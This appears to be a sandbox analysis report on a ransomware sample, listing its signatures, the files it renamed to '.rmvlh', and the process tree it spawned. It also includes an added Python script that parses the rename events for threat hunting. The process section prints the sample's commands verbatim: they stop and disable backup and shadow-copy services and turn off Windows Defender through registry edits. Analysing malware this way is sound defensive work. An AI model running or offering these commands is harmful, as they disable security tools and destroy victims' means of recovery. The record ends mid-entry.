Analysis
max time kernel: 110s
max time network: 153s
platform: windows10_x64
resource: win10-en-20211208
submitted: 13-01-2022 11:09

Static task: static1
Behavioral task: behavioral1
  Sample: cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample: cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe
  Resource: win10-en-20211208

General
Target: cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe
Size: 2.5MB
MD5: 9c156aff00fc0ac66ed918d000041932
SHA1: f2fc2bade3f0447ff68bf2c00dadcce1a966b4a0
SHA256: cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52
SHA512: 43834c400a1a4fb83db8c16332345c86b1e568d45944b31721e9098f00dfe3be731d0661c02e103a4179cf8f35771d842d4dfa36aefd1a60f6577448f2600b02
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
  pid 3220  MpCmdRun.exe
-
Modifies security service 2 TTPs 1 IoCs
Processes:
  description: Set value (int)
  ioc: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"
  process: reg.exe
-
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Drops file in Program Files directory 64 IoCs
Processes:
  description: File opened for modification (all 64 entries)
  process: cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe (all 64 entries)
  ioc:
  C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_fr.properties.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_BfcFJ60wSfE0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.w3c.dom.svg_1.1.0.v201011041433.jar.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_XB5kDCSpuh00.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-impl.xml.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_SHD8Ga0cK1A0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-loaders.xml.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_iUcjNoPdyeE0.rmvlh
  C:\Program Files\Common Files\System\ado\msador28.tlb
  C:\Program Files\Common Files\microsoft shared\ink\zh-CN\tipresx.dll.mui
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_zh_4.4.0.v20140623020002.jar.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_Z0kzsJ1HtO40.rmvlh
  C:\Program Files\Microsoft Office\root\Licenses16\MondoR_OEM_Perp-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_urqyWfJBd0E0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\include\jni.h.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_VpeGcDRx_600.rmvlh
  C:\Program Files\Common Files\System\Ole DB\ja-JP\sqlxmlx.rll.mui.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_xBqcQlci4kU0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.ja_5.5.0.165303.jar.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_fhU_Z6zugZM0.rmvlh
  C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_VNw5g3Qbr1U0.rmvlh
  C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Retail-pl.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_UMSBdz8Ts9k0.rmvlh
  C:\Program Files\Common Files\System\Ole DB\es-ES\oledb32r.dll.mui
  C:\Program Files\Microsoft Office\root\Licenses16\VisioStdR_Retail-ul-phn.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_wQN5AI0iNYw0.rmvlh
  C:\Program Files\Java\jre1.8.0_66\Welcome.html.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_pPwk5yAlVgA0.rmvlh
  C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest3-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_gO-pvtuqATU0.rmvlh
  C:\Program Files\Common Files\microsoft shared\MSInfo\fr-FR\msinfo32.exe.mui.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_gdwyXg3xypw0.rmvlh
  C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base_altgr.xml
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\MANIFEST.MF.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_hN28bvevx-M0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.attributeTransformation.exsd.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_EWoFHzeUDqE0.rmvlh
  C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Retail-pl.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_7hiRmaQnIQA0.rmvlh
  C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019VL_KMS_Client_AE-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_-Ir3_eeKWB40.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-loaders_zh_CN.jar.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_D3N2gOcL0mQ0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvmstat.jar.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_92oFVzAOjao0.rmvlh
  C:\Program Files\Microsoft Office\root\Licenses16\ExcelVL_KMS_Client-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_X-BDUvRup240.rmvlh
  C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_OEM_Perp-ppd.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_mtM1aX1OgJc0.rmvlh
  C:\Program Files\Common Files\System\Ole DB\es-ES\sqloledb.rll.mui
  C:\Program Files\Common Files\System\msadc\es-ES\msdaremr.dll.mui
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.jrockit.mc.rcp.product_root_5.5.0.165303.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_jCbFDIbA3Og0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-swing-tabcontrol.xml.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_4dQJGfwtA7I0.rmvlh
  C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_Grace-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_bGzC-_3gzRQ0.rmvlh
  C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_Subscription-pl.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_UNjpLQN5E9A0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfxswt.jar.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_XK87vMmqKwc0.rmvlh
  C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019VL_MAK_AE-pl.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_YyhcRbDQLPI0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-modules-appui.xml.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_D6LiYSJy_580.rmvlh
  C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_fr.properties.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_fEkoqdYFmNM0.rmvlh
  C:\Program Files\Microsoft Office\root\Licenses16\Excel2019VL_MAK_AE-ul-phn.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_qY450fw5BSo0.rmvlh
  C:\Program Files\7-Zip\descript.ion.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_CVb6LtUXU5Y0.rmvlh
  C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_OEM_Perp-ul-phn.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_dfWez84sGvw0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_zh_CN.properties.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_GXY1VYBujJ00.rmvlh
  C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_Retail-ppd.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_cmr1HdkCTPE0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.xml.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_xlnSAD8vFOM0.rmvlh
  C:\Program Files\Common Files\microsoft shared\Stationery\Garden.htm
  C:\Program Files\Common Files\microsoft shared\ink\de-DE\IPSEventLogMsg.dll.mui
  C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfr\profile.jfc.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_Gb2tZdhSuaI0.rmvlh
  C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_OEM_Perp-ul-phn.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_MUCqyzXav_k0.rmvlh
  C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial4-ppd.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_HRWaX3r8utk0.rmvlh
  C:\Program Files\Common Files\System\msadc\ja-JP\msdaremr.dll.mui
  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application-views.xml.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_rzyYxO7H7VA0.rmvlh
  C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Trial-ppd.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_FL_9_8wZ6zU0.rmvlh
  C:\Program Files\Common Files\System\Ole DB\en-US\oledb32r.dll.mui
  C:\Program Files\Microsoft Office\root\Licenses16\pkeyconfig-office-client15.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_zPnEz3aOdsA0.rmvlh
  C:\Program Files\ExitGroup.eprtx.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_879Ncg2tbk00.rmvlh
  C:\Program Files\Microsoft Office\root\Licenses16\VisioProO365R_SubTrial-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_JBJ1ySAXUc40.rmvlh
  C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Grace-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_tLcEOpc0HzE0.rmvlh
  C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_OEM_Perp-pl.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_dJglFczl9640.rmvlh
  C:\Program Files\Common Files\System\Ole DB\fr-FR\oledb32r.dll.mui.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_AsXRmUtmEtA0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\include\jvmti.h.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_wW-RskY7mRg0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-execution.jar.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_9bBxLSh4Xmw0.rmvlh
  C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription5-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_WFkHCgwaei40.rmvlh
  C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_Retail2-pl.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_zwhtPkcdlF40.rmvlh
  C:\Program Files\7-Zip\Lang\an.txt.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_532CRsP1Vac0.rmvlh
  C:\Program Files\Common Files\System\Ole DB\fr-FR\sqloledb.rll.mui.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_F22779o8nzs0.rmvlh
-
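The 64 file events above are easier to parse than to read. In every renamed entry the appended suffix has the same shape: the original name, a dot, one 43-character token that is identical across all files on this page (UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b), an underscore, a 12-character token that differs per file, and `.rmvlh`. A handful of files (msador28.tlb, several .mui files) are opened for modification without being renamed. The Python script below is an added example, not part of the sandbox output: it parses events of this shape, separates renamed files from merely opened ones, confirms that the shared token is constant, and derives a glob for sweeping other hosts. The sample lines are copied from the signature above (a subset of the 64). The remark in the comments that 43 and 12 base64url characters encode 32 and 9 bytes is the editor's inference about the token lengths; the report itself does not say what the tokens are or that the files were encrypted.

```python
"""Parse sandbox "File opened for modification" events and separate files
renamed with the ransomware suffix from files that were only opened.
Added example, not part of the report; sample events copied from the page."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Shape observed on this page: <original path>.<43 chars>_<12 chars>.rmvlh
# 43 base64url characters encode exactly 32 bytes and 12 encode 9 bytes, so a
# per-victim 32-byte value plus a 9-byte per-file value would fit; that is an
# inference by the editor. The lengths themselves are what the page shows.
RENAME_RE = re.compile(
    r"^(?P<original>.+)\.(?P<shared>[A-Za-z0-9_-]{43})_(?P<per_file>[A-Za-z0-9_-]{12})\.rmvlh$"
)
ACTION = "File opened for modification"

# Copied from the report (subset of the 64 entries).
SAMPLE_EVENTS = r"""
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_fr.properties.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_BfcFJ60wSfE0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe
File opened for modification C:\Program Files\Common Files\System\ado\msador28.tlb cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe
File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jni.h.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_VpeGcDRx_600.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe
File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_VNw5g3Qbr1U0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\zh-CN\tipresx.dll.mui cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest3-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_gO-pvtuqATU0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019VL_KMS_Client_AE-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_-Ir3_eeKWB40.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe
File opened for modification C:\Program Files\7-Zip\descript.ion.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_CVb6LtUXU5Y0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe
File opened for modification C:\Program Files\ExitGroup.eprtx.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_879Ncg2tbk00.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe
"""


@dataclass(frozen=True)
class FileEvent:
    action: str
    path: str
    process: str


@dataclass(frozen=True)
class Rename:
    original: str   # path as it was before the suffix was appended
    shared: str     # token identical across every renamed file on this page
    per_file: str   # token that differs per file


def parse_event(line: str) -> FileEvent:
    """Split '<action> <path, may contain spaces> <process>' into fields.
    The process name is the last whitespace-free token, so split from the right."""
    if not line.startswith(ACTION + " "):
        raise ValueError(f"unexpected event line: {line!r}")
    path, process = line[len(ACTION) + 1:].rsplit(" ", 1)
    return FileEvent(ACTION, path, process)


def classify_path(path: str) -> Optional[Rename]:
    """Return the rename components if the path carries the suffix, else None."""
    m = RENAME_RE.match(path)
    return Rename(m["original"], m["shared"], m["per_file"]) if m else None


def ext_of(path: str) -> str:
    name = path.rsplit("\\", 1)[-1]
    return name[name.rfind("."):] if "." in name else ""


def hunt_glob(shared: str) -> str:
    """Glob for sweeping other hosts for files carrying the same shared token."""
    return f"*.{shared}_*.rmvlh"


def summarize(lines) -> dict:
    events = [parse_event(l) for l in lines if l.strip()]
    renamed, untouched = [], []
    for ev in events:
        r = classify_path(ev.path)
        (renamed if r else untouched).append((ev, r))
    return {
        "total": len(events),
        "renamed": len(renamed),
        "not_renamed": len(untouched),
        "shared_tokens": Counter(r.shared for _, r in renamed),
        "renamed_extensions": Counter(ext_of(r.original) for _, r in renamed),
        "untouched_paths": [ev.path for ev, _ in untouched],
        "processes": Counter(ev.process for ev in events),
    }


if __name__ == "__main__":
    s = summarize(SAMPLE_EVENTS.splitlines())
    print(f"{s['renamed']} renamed, {s['not_renamed']} only opened")
    for token, n in s["shared_tokens"].items():
        print(f"shared token {token} on {n} files; hunt with {hunt_glob(token)}")
    print("original extensions of renamed files:", dict(s["renamed_extensions"]))
```

The shared token, not the `.rmvlh` extension, is the pivot worth keeping: the extension is the same for every victim of this build, while the 43-character token ties files to one run.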
Launches sc.exe
sc.exe is the Windows utility for controlling services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
  pid 916  vssadmin.exe
-
Modifies registry class 3 IoCs
Processes:
  description  ioc  process
  Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP  reg.exe
  Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP  reg.exe
  Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP  reg.exe
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
  pid 2916  powershell.exe  (3 events)
  pid 3412  powershell.exe  (3 events)
  pid 2632  cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe  (2 events)
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
  pid 3148  wevtutil.exe  Token: SeSecurityPrivilege, SeBackupPrivilege
  pid 3184  wevtutil.exe  Token: SeSecurityPrivilege, SeBackupPrivilege
  pid 2084  wevtutil.exe  Token: SeSecurityPrivilege, SeBackupPrivilege
  pid 1728  wmic.exe  Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  pid 3252  wmic.exe  Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  pid 3252  wmic.exe  Token (second adjustment): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
  (parent PID and image -> child PID and image; every write is recorded three times on this page, except the last, where the list stops at 64 IoCs)
  PID 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe -> 3796 net.exe  (3 events)
  PID 3796 net.exe -> 3864 net1.exe  (3 events)
  PID 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe -> 3360 net.exe  (3 events)
  PID 3360 net.exe -> 512 net1.exe  (3 events)
  PID 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe -> 800 net.exe  (3 events)
  PID 800 net.exe -> 2220 net1.exe  (3 events)
  PID 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe -> 2812 net.exe  (3 events)
  PID 2812 net.exe -> 788 net1.exe  (3 events)
  PID 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe -> 3728 net.exe  (3 events)
  PID 3728 net.exe -> 1460 net1.exe  (3 events)
  PID 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe -> 3516 net.exe  (3 events)
  PID 3516 net.exe -> 480 net1.exe  (3 events)
  PID 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe -> 2824 net.exe  (3 events)
  PID 2824 net.exe -> 1244 net1.exe  (3 events)
  PID 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe -> 1276 net.exe  (3 events)
  PID 1276 net.exe -> 1236 net1.exe  (3 events)
  PID 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe -> 2552 net.exe  (3 events)
  PID 2552 net.exe -> 3692 net1.exe  (3 events)
  PID 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe -> 1668 sc.exe  (3 events)
  PID 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe -> 404 sc.exe  (3 events)
  PID 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe -> 808 sc.exe  (3 events)
  PID 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe -> 2232 sc.exe  (1 event, list truncated)
Processes
-
(each entry: image path [depth in the process tree], then the command line as executed, then the signatures it matched and its PID)

C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe  [1]
  "C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe"
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2632
-
C:\Windows\SysWOW64\net.exe  [2]
  net.exe stop "SamSs" /y
- Suspicious use of WriteProcessMemory
PID:3796
-
C:\Windows\SysWOW64\net1.exe  [3]
  C:\Windows\system32\net1 stop "SamSs" /y
PID:3864
-
C:\Windows\SysWOW64\net.exe  [2]
  net.exe stop "SDRSVC" /y
- Suspicious use of WriteProcessMemory
PID:3360
-
C:\Windows\SysWOW64\net1.exe  [3]
  C:\Windows\system32\net1 stop "SDRSVC" /y
PID:512
-
C:\Windows\SysWOW64\net.exe  [2]
  net.exe stop "SstpSvc" /y
- Suspicious use of WriteProcessMemory
PID:800
-
C:\Windows\SysWOW64\net1.exe  [3]
  C:\Windows\system32\net1 stop "SstpSvc" /y
PID:2220
-
C:\Windows\SysWOW64\net.exe  [2]
  net.exe stop "UI0Detect" /y
- Suspicious use of WriteProcessMemory
PID:2812
-
C:\Windows\SysWOW64\net1.exe  [3]
  C:\Windows\system32\net1 stop "UI0Detect" /y
PID:788
-
C:\Windows\SysWOW64\net.exe  [2]
  net.exe stop "vmicvss" /y
- Suspicious use of WriteProcessMemory
PID:3728
-
C:\Windows\SysWOW64\net1.exe  [3]
  C:\Windows\system32\net1 stop "vmicvss" /y
PID:1460
-
C:\Windows\SysWOW64\net.exe  [2]
  net.exe stop "VSS" /y
- Suspicious use of WriteProcessMemory
PID:3516
-
C:\Windows\SysWOW64\net1.exe  [3]
  C:\Windows\system32\net1 stop "VSS" /y
PID:480
-
C:\Windows\SysWOW64\net.exe  [2]
  net.exe stop "wbengine" /y
- Suspicious use of WriteProcessMemory
PID:2824
-
C:\Windows\SysWOW64\net1.exe  [3]
  C:\Windows\system32\net1 stop "wbengine" /y
PID:1244
-
C:\Windows\SysWOW64\net.exe  [2]
  net.exe stop "WebClient" /y
- Suspicious use of WriteProcessMemory
PID:1276
-
C:\Windows\SysWOW64\net1.exe  [3]
  C:\Windows\system32\net1 stop "WebClient" /y
PID:1236
-
C:\Windows\SysWOW64\net.exe  [2]
  net.exe stop "UnistoreSvc_1323b" /y
- Suspicious use of WriteProcessMemory
PID:2552
-
C:\Windows\SysWOW64\net1.exe  [3]
  C:\Windows\system32\net1 stop "UnistoreSvc_1323b" /y
PID:3692
-
C:\Windows\SysWOW64\sc.exe  [2]
  sc.exe config "SamSs" start= disabled
PID:1668
-
C:\Windows\SysWOW64\sc.exe  [2]
  sc.exe config "SDRSVC" start= disabled
PID:404
-
C:\Windows\SysWOW64\sc.exe  [2]
  sc.exe config "SstpSvc" start= disabled
PID:808
-
C:\Windows\SysWOW64\sc.exe  [2]
  sc.exe config "UI0Detect" start= disabled
PID:2232
-
C:\Windows\SysWOW64\sc.exe  [2]
  sc.exe config "vmicvss" start= disabled
PID:1332
-
C:\Windows\SysWOW64\sc.exe  [2]
  sc.exe config "VSS" start= disabled
PID:1744
-
C:\Windows\SysWOW64\sc.exe  [2]
  sc.exe config "wbengine" start= disabled
PID:1784
-
C:\Windows\SysWOW64\sc.exe  [2]
  sc.exe config "WebClient" start= disabled
PID:2044
-
C:\Windows\SysWOW64\sc.exe  [2]
  sc.exe config "UnistoreSvc_1323b" start= disabled
PID:2156
-
C:\Windows\SysWOW64\reg.exe  [2]
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
PID:2456
-
C:\Windows\SysWOW64\reg.exe  [2]
  reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
PID:2936
-
C:\Windows\SysWOW64\reg.exe  [2]
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
PID:3036
-
C:\Windows\SysWOW64\reg.exe  [2]
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
PID:1496
-
C:\Windows\SysWOW64\reg.exe  [2]
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
PID:848
-
C:\Windows\SysWOW64\reg.exe  [2]
